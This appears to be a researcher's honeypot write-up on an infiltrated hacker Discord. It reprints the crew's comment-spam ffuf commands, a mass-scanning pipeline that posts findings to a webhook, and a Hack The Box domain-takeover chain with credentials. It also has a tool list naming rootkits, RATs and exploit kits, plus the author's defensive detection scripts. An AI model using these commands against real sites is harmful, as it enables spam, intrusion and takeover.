Tue Aug 29 23:34:08 2023
“We have begun a difficult and uncertain journey, and none of us can see its end, but our cause remains a just one. That truth honours and sanctifies our fallen comrades who have made the ultimate sacrifice so that we might carry on the work that is ahead of us. We are gathered here today to honour their memory and their names.”
“May God stand between you and harm in all the empty places where you must walk.”
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data: there's a lot to manage and a lot coming in while I am still trying to analyze it manually to a certain degree and monitor services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&email=##redacted-site##%40gmail.com&url=https://##redacted-site##/&submit=Post+Comment&comment_post_ID=1&comment_parent=0&wp-comment-cookies-consent=true'),
I randomly tracked the redacted log above down to a Discord invite, then "socially engineered" my way into the chat. Inside the initial "halt who goes there" access restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced people, totalling about 20 people. I ignored most of it, since it wasn't really relevant and was mostly just exchanging racist nonsense. Plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:
“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”
wget -c s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
# the zip holds a single file, top-1m.csv, not a directory (the original "cd top-1m.csv" fails); strip the rank column
sed -e "s/.*,//g" top-1m.csv > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
head -n 100000 top1mhttp.txt > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
jq -r .results[].url workinghttp.txt | sort -u > top1mworkinghttp.txt
# a GET to wp-comments-post.php on a WordPress site answers 405 Method Not Allowed, which is what -mc 405 keys on
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
jq -r .results[].url wp-comments-post.json > wp-comments-post.txt
“[11/16/2022 5:27 AM] Screen quick cheatsheet:”
screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)
“Making backlinks with ffuf”
ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: http://yoursite.com/" -d "comment=hello+world&author=hey&email=hey%40gmail.com&url=http%3A%2F%2Fyoursite.com%2F&submit=Post+Comment&comment_post_ID=5&comment_parent=0" -H "User-Agent: Mozilla/5.0 (Firefox)"
Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself, they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate out of mostly Bangladesh but this group mostly spoke Portuguese it seemed.
I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.
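The other side of that ffuf template is telling it apart from a real comment in a capture like the one at the top of this page. The following is an added example, not the crew's code and not this site's honeypot parser. It assumes the capture format shown above (a Python list literal of ('in'/'out', bytes) tuples, one raw request per 'in' entry); the two captures embedded in it are constructed, with placeholder hostnames, one mirroring the crew's template and one mirroring what a browser sends from a real comment form.

```python
import ast
from urllib.parse import parse_qs, urlparse

# Two constructed captures in the honeypot's list-of-(direction, bytes) format.
# Hostnames are placeholders.  The first mirrors the crew's ffuf template
# (off-site Referer, backlink in both the url field and the comment); the
# second is what a browser sends when a visitor really uses the comment form.
SPAM_CAPTURE = r"""[('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: honeypot.example\x0d\x0aUser-Agent: Mozilla/5.0 (Firefox)\x0d\x0aReferer: http://yoursite.example/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0a\x0d\x0acomment=hello+world+http%3A%2F%2Fyoursite.example%2F&author=hey&email=hey%40gmail.com&url=http%3A%2F%2Fyoursite.example%2F&submit=Post+Comment&comment_post_ID=5&comment_parent=0')]"""
LEGIT_CAPTURE = r"""[('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: honeypot.example\x0d\x0aUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0\x0d\x0aReferer: https://honeypot.example/?p=5\x0d\x0aCookie: comment_author_x=alice\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0a\x0d\x0acomment=Nice+write-up%2C+thanks&author=alice&email=alice%40example.org&url=&submit=Post+Comment&comment_post_ID=5&comment_parent=0&wp-comment-cookies-consent=true')]"""


def inbound_requests(capture_text):
    """Return the raw bytes of every 'in' entry in a capture literal."""
    return [data for direction, data in ast.literal_eval(capture_text) if direction == "in"]


def parse_request(raw):
    """Split one raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1")


def spam_indicators(raw):
    """List the comment-spam indicators one request matches (empty = none)."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.split("?", 1)[0] != "/wp-comments-post.php":
        return []
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    host = headers.get("host", "").lower()
    referer_host = (urlparse(headers.get("referer", "")).hostname or "").lower()
    backlink_host = (urlparse(form.get("url", "")).hostname or "").lower()
    hits = []
    # A browser posts the comment form from the post page on the same site;
    # the crew's template sets Referer to the site being promoted instead.
    if referer_host and referer_host != host:
        hits.append("referer is off-site")
    if backlink_host and backlink_host == referer_host:
        hits.append("backlink url host equals referer host")
    if backlink_host and backlink_host in form.get("comment", "").lower():
        hits.append("comment body repeats the backlink host")
    return hits


def scan(capture_text):
    """Indicator lists for every inbound request in a capture, in order."""
    return [spam_indicators(raw) for raw in inbound_requests(capture_text)]


if __name__ == "__main__":
    for label, capture in (("spam", SPAM_CAPTURE), ("legit", LEGIT_CAPTURE)):
        for hits in scan(capture):
            print(label, "->", hits or "no indicators")
```

Run it on a real capture by passing the literal text to scan(); a request that trips all three indicators is the crew's template almost verbatim, while a single off-site Referer on its own is weak evidence (some privacy extensions strip or rewrite it).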
Here is another project, which takes in-scope wildcard domains from the public HackerOne dataset, enumerates and probes their subdomains, runs nuclei against whatever answers, and posts each finding as a JSON webhook (to the operator's Discord channel, per the instructions below), so the targets should at least be ones that accept reports.
/usr/bin/getallscope
#!/usr/bin/python3
import json
import random
import requests

# arkadiyt/bounty-targets-data: public snapshot of HackerOne program scopes
url = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json"
r = requests.get(url=url, timeout=30)
fullz = []
datas = json.loads(r.text)
for data in datas:
    if "targets" not in data: continue
    for target in data["targets"]["in_scope"]:
        # keep wildcard assets that pay bounties and currently accept reports
        if not target["asset_identifier"].startswith("*."): continue
        if target["eligible_for_bounty"] != True: continue
        if target["eligible_for_submission"] != True: continue
        fullz.append(target["asset_identifier"][2:])
random.shuffle(fullz)
print("\n".join(fullz))
/usr/bin/getrandscope
#!/bin/bash
getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile
/usr/bin/autopwn
#!/bin/bash
rm -f probed foundvuln.txt tmpfile;
getrandscope;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;
/usr/bin/sendwebhook (change webhook url to yours)
#!/bin/bash
# nuclei hands over one finding per invocation (xargs -L 1); build the JSON with jq
# so quotes, backslashes or newlines in the finding cannot break the payload
argstr="$*";
echo "$argstr";
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "$(jq -cn --arg c "$argstr" '{name:"hello", content:$c}')";
sleep 2;
/usr/bin/pwnforever
#!/bin/bash
while true; do
autopwn;
done
“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”
nohup pwnforever &
“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”
“takes urls from stdin and prints only the ones with unique parameter names”
#!/usr/bin/python3
import sys

# signatures (path + parameter names) already printed
urlparamlist = []

def getpath(url):
    if "://" not in url: return ""
    urll = url.split("://")[1]
    urll = "/".join(urll.split("/")[1:])
    if "?" in urll: urll = urll.split("?")[0]
    return urll

def alreadyparam(url):
    global urlparamlist
    urlparams = url.split("?")
    if len(urlparams) > 1:
        urlparams = urlparams[1]
    else:
        urlparams = ""
    names = []
    for urlparam in urlparams.split("&"):
        if "=" not in urlparam: continue
        names.append(urlparam.split("=")[0])
    # separator between path and names, so path "ab" + "c" != path "a" + "bc"
    paramsfull = getpath(url) + "?" + "&".join(names)
    if paramsfull not in urlparamlist:
        urlparamlist.append(paramsfull)
        return 0
    else:
        return 1

for url in sys.stdin:
    url = url.strip()
    if not alreadyparam(url):
        print(url)
“example:”
cat all_urls.txt | python uniqparam.py > unique_param.txt
function grabipranges() {
    // collect the IPv4 prefixes linked from a bgp.tools page; "::" skips IPv6
    let full = "";
    const links = document.getElementsByTagName("a");
    for (let i = 0; i < links.length; i++) {
        if (!links[i].href) continue;
        if (links[i].href.indexOf("/prefix/") == -1) continue;
        if (links[i].href.indexOf("::") !== -1) continue;
        full += links[i].href.split("prefix/")[1] + " ";
    }
    console.log(full);
}
grabipranges();
“little script to grab all ip ranges from bgp.tools”
#!/bin/bash
if [[ $# -lt 1 ]]; then
    echo "$0 <domain>";
    exit;
fi
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null; then
    sudo apt install assetfinder;
fi
if ! which getallurls &>/dev/null; then
    sudo apt install getallurls;
fi
if ! which nmap &>/dev/null; then
    sudo apt install nmap;
fi
if ! which httprobe &>/dev/null; then
    sudo apt install httprobe;
fi
if ! which dirsearch &>/dev/null; then
    sudo apt install dirsearch;
fi
echo "Cleaning up previous scan files...";
rm -f assetsfound.txt all_urls.txt nmap-scan.txt assetsworking.txt dirsearched.txt dirsearched_customlist.txt customwordlist.txt;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only "$1" | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
sort -u assetsfound.txt > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
sort -u assetsworking.txt > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
# split each front page into tokens on whitespace, control and punctuation characters
for i in $(cat assetsworking.txt); do curl -s "$i" --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
sort -u customwordlist.txt > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls "$i" | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";
#!/usr/bin/python3
# reads urls from stdin, replaces every parameter value with the payload given
# as the first argument, and prints each distinct path + parameter-name set once
import sys

if len(sys.argv) < 2:
    sys.exit("usage: {} <payload> < urls.txt".format(sys.argv[0]))
payload = sys.argv[1]
urlparamlist = []

def getpath(url):
    if "://" not in url: return ""
    urll = url.split("://")[1]
    urll = "/".join(urll.split("/")[1:])
    if "?" in urll: urll = urll.split("?")[0]
    return urll

def getbase(url):
    schema = url.split("://")[0]
    url = url.split("://")[1]
    if "/" in url: url = url.split("/")[0]
    fullurl = "{}://{}/".format(schema, url)
    return fullurl

def alreadyparam(url):
    global urlparamlist
    paramsfull = ""
    urlparams = url.split("?")
    if len(urlparams) > 1:
        urlparams = urlparams[1]
    else:
        urlparams = ""
    paramsfull += getpath(url) + "?"
    for urlparam in urlparams.split("&"):
        if "=" not in urlparam: continue
        urlparam = urlparam.split("=")[0]
        paramsfull += "{}={}&".format(urlparam, payload)
    paramsfull = "&".join(paramsfull.split("&")[:-1])
    if paramsfull not in urlparamlist:
        urlparamlist.append(paramsfull)
        print(getbase(url) + paramsfull)
        return 0
    else:
        return 1

for url in sys.stdin:
    url = url.strip()
    alreadyparam(url)
“generate custom wordlist from cewl output”
cat cewld.txt | python3 wordg.py > generated.txt
import sys

words = []
for line in sys.stdin:
    words.append(line.strip())
words = list(set(words))

def mk(lower=False):
    # every ordered pair of distinct words, joined bare and with -, ., _
    for word in words:
        for word2 in words:
            if word == word2: continue
            a, b = (word.lower(), word2.lower()) if lower else (word, word2)
            print("{}{}".format(a, b))
            print("{}-{}".format(a, b))
            print("{}.{}".format(a, b))
            print("{}_{}".format(a, b))

# the original wrapped these in print(), which appended a stray "None" line to the wordlist
mk()
mk(lower=True)
These I believe are logs of their CTF challenge successes (the support.htb hostname and the 10.10.11.0/24 address are Hack The Box conventions).
Nmap scan report for 10.10.11.174
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46499/tcp): CLEAN (Timeout)
| Check 2 (port 19493/tcp): CLEAN (Timeout)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 55678/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-10-31T19:18:57
|_ start_date: N/A
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@support.htb
|_ administrator@support.htb
SMB dc.support.htb 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB dc.support.htb 445 DC [+] support.htb\guest:
SMB dc.support.htb 445 DC [+] Enumerated shares
SMB dc.support.htb 445 DC Share Permissions Remark
SMB dc.support.htb 445 DC ----- ----------- ------
SMB dc.support.htb 445 DC ADMIN$ Remote Admin
SMB dc.support.htb 445 DC C$ Default share
SMB dc.support.htb 445 DC IPC$ READ Remote IPC
SMB dc.support.htb 445 DC NETLOGON Logon server share
SMB dc.support.htb 445 DC support-tools READ support staff tools
SMB dc.support.htb 445 DC SYSVOL Logon server share
CREDS:
ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Version]
signature="$CHICAGO$"
Revision=1
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,2
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
CREDS
support
Ironside47pleasure40Watchful
LOGIN PS
evil-winrm -i dc.support.htb -u support
REMOTE
# resource-based constrained delegation: create a machine account (PowerMad's New-MachineAccount),
# then allow it to delegate to the DC by writing msDS-AllowedToActOnBehalfOfOtherIdentity
New-MachineAccount -MachineAccount "##redacted-machine##" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "##redacted-machine##$"
.\Rubeus.exe hash /password:123456 /user:##redacted-machine##$ /domain:support.htb
LOCAL
# S4U2self + S4U2proxy as the new machine account, impersonating administrator, then psexec with the resulting ticket
impacket-getST support.htb/##redacted-machine##$ -spn http/dc.support.htb -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip dc.support.htb
export KRB5CCNAME=administrator.ccache
impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
ROOTT FUCCKING FINNAALLYY ##redacted##
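The secedit export above and the delegation chain that follows it belong together: the chain only works when an ordinary account can create a machine account and can then write the delegation attribute on the DC. The following is an added example, not tooling from the crew, that reads the INI-style .inf export format shown above and flags the settings that matter for it. The sample text is excerpted and trimmed from the export pasted above; my reading that the second template is the domain-controller policy is an assumption, and the ms-DS-MachineAccountQuota attribute (the other half of the "add a machine account" permission) is not part of a secedit export, so only the privilege side is checked here.

```python
import re

# Excerpted and trimmed from the secedit export pasted above: two templates
# concatenated in one paste (assumed: domain policy, then DC policy).
SAMPLE_INF = r"""
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
LockoutBadCount = 0
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,2
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
[Privilege Rights]
SeMachineAccountPrivilege = *S-1-5-11
SeEnableDelegationPrivilege = *S-1-5-32-544
"""

# Well-known SIDs that make a right effectively open to every domain account.
BROAD_SIDS = {"*S-1-1-0": "Everyone", "*S-1-5-11": "Authenticated Users", "*S-1-5-32-545": "Users"}


def split_exports(text):
    """secedit writes one template per file and each starts with [Unicode]."""
    return [chunk for chunk in re.split(r"(?m)^\[Unicode\][ \t]*$", text) if chunk.strip()]


def parse_inf(text):
    """Parse one template into {section: {key: value}} (keys keep their case)."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def audit(template):
    """Findings for the settings the chain above depends on, as short strings."""
    findings = []
    holders = template.get("Privilege Rights", {}).get("SeMachineAccountPrivilege", "").split(",")
    broad = [BROAD_SIDS[h.strip()] for h in holders if h.strip() in BROAD_SIDS]
    if broad:
        findings.append("SeMachineAccountPrivilege held by %s: any domain account can add the machine account used for RBCD" % ", ".join(broad))
    access = template.get("System Access", {})
    if access.get("LockoutBadCount") == "0":
        findings.append("LockoutBadCount=0: no lockout, password spraying is unthrottled")
    if access.get("MaximumPasswordAge") == "-1":
        findings.append("MaximumPasswordAge=-1: passwords never expire")
    for key, value in template.get("Registry Values", {}).items():
        # 4,2 = require signing; 4,1 = negotiate only, so unsigned binds are accepted
        if key.endswith("\\LDAPServerIntegrity") and value != "4,2":
            findings.append("LDAPServerIntegrity=%s: LDAP signing not required" % value)
    return findings


def audit_paste(text):
    """One findings list per template in a pasted export."""
    return [audit(parse_inf(chunk)) for chunk in split_exports(text)]


if __name__ == "__main__":
    for n, findings in enumerate(audit_paste(SAMPLE_INF), 1):
        print("template %d:" % n)
        for finding in findings:
            print("  -", finding)
```

Feed it the output of secedit /export /cfg on a box you own, or a paste like the one above. Note that SeMachineAccountPrivilege for Authenticated Users is the Windows default, so the finding is a prompt to set ms-DS-MachineAccountQuota to 0 rather than a misconfiguration on its own; LockoutBadCount=0 and the unsigned-LDAP template are the ones worth fixing outright.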
how to get
[img of i3 for kali]
- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot
Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm
Apparently using the control code \x0a as a username will be accepted by Discord (UPDATE: not true anymore), but makes a blank username. This was used by a non-core member of said crew.
https://book.hacktricks.xyz/welcome/readme
https://cheatsheetseries.owasp.org/
https://github.com/danielmiessler/SecLists
https://github.com/vavkamil/awesome-bugbounty-tools
dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools, it's a must-have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories
https://cyberchef.org/ - mess with various data formats and encodings (great tool)
https://check-host.net/ - check availability of hosts, tcp and udp ports, ping, geolocation and more
https://bgp.tools/ - bgp tools
https://bgp.he.net/ - even more bgp tools
https://dehashed.com/ - service to find passwords from breaches
https://www.whoxy.com/ - whois history, reverse whois and other whois tools
crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration
masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http
linpeas - privilege escalation and info gathering script works every time (ok 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding
powershell-empire - c2/post exploitation framework with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux
rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb
Google - the most powerful of them all..
doxtool.py - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files
hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols
Wyd.pl - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt
Exploitation Tools:
metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line
Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in milliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent
x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering
pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates
Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old style "1337-speak" is no longer a thing, and broken English is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface); impersonating well-known influencers was a common tactic. This made for very expressive, "reactive" people that were easily memeable and easy to communicate with via GIFs. The way I stayed on was adopting an identity of my own, and I will keep that identity to myself.
Eventually a link was posted to https://skidson.online/admin.php which provided a ton of other DNS entries.
Description provided of features:
- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim
These are some of the more sanitized chat/meme examples: